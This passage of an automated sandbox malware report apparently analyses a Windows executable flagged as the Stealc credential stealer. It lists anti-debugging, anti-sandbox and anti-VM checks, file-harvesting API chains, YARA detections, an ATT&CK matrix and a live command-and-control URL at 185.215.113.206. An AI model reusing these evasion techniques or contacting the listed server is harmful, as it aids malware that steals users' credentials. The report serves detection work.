                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29CAB second address: F29D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jne 00007F47DD40FB8Fh 0x0000000d nop 0x0000000e mov dx, bx 0x00000011 push 00000004h 0x00000013 mov edx, dword ptr [ebp+122D3A28h] 0x00000019 jmp 00007F47DD40FB87h 0x0000001e call 00007F47DD40FB79h 0x00000023 push edx 0x00000024 push eax 0x00000025 pushad 0x00000026 popad 0x00000027 pop eax 0x00000028 pop edx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557033C second address: 5570383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 6EEC5DA3h 0x00000010 jmp 00007F47DCFB8A48h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F47DCFB8A3Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5570383 second address: 5570398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5570398 second address: 55703A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A3Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55703A8 second address: 557040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F47DD40FB87h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47DD40FB84h 0x00000017 or cl, 00000008h 0x0000001a jmp 00007F47DD40FB7Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F47DD40FB87h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557040C second address: 5570429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5570429 second address: 557042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557042F second address: 5570433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F557 second address: E4F55C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CA1CC9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CA1C2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E40BC0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E3FB1A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C9F1EE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ECB5EF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00A538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A54910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00A4DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00A4E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00A4ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00A54570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00A53EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A4F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4F68A FindFirstFileA,0_2_00A4F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A4DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00A4BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A41160 GetSystemInfo,ExitProcess,0_2_00A41160
                Source: file.exe, file.exe, 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware8
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2137808772.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13639
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13636
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13658
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13650
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13690
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A445C0 VirtualProtect ?,00000004,00000100,000000000_2_00A445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A59860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A59750 mov eax, dword ptr fs:[00000030h]0_2_00A59750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00A578E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5752, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A59600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00A59600
                Source: file.exe, file.exe, 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00A57B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A57980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00A57980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A57850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00A57850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A57A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00A57A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.a40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5752, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.a40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5752, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.206/14%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                		13.107.246.45
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/trueunknown
                http://185.215.113.206/e2b1563c6670f193.phptrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/e2b1563c6670f193.php/file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.215.113.206kz.P6file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.php9file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/mfile.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/e2b1563c6670f193.php%file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/e2b1563c6670f193.phpEfile.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/wsfile.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/e2b1563c6670f193.phpafile.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.206/tfile.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.206
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1542671
                                      Start date and time:2024-10-26 05:54:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 3s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:2
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 91
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.206file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousLummaC, StealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      zE8aZ90GHB.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.206/k8FppT/index.php
                                      0deHOGnvX6.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.206/k8FppT/index.php
                                      0deHOGnvX6.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.206/k8FppT/index.php?scr=1

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      s-part-0017.t-0009.t-msedge.nethttps://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
                                      • 13.107.246.45
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 13.107.246.45
                                      http://mychronictravel.eu.org/Get hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://docs.google.com/drawings/d/1igp9x84Q_2r8qSa1YDSk9dpVvjHGWjRjQMSbSGGfj2M/preview?pli=1VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1BvGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://certify.us.com/D5QkoQ3Eniw4G2APQ3ED5QpQ3E4RAionz01coq01Get hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      Rob.Kuster@stonhard.com.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                      • 13.107.246.45
                                      zip file.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                      • 13.107.246.45
                                      ACTION required to activate your account - bp Supplier Portal.emlGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45
                                      https://docs.google.com/drawings/d/1gvM7ysnJ7zDcSUShXnPoiA6pG4cjDDn9uHRbivsGidA/preview?pli=1jjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8E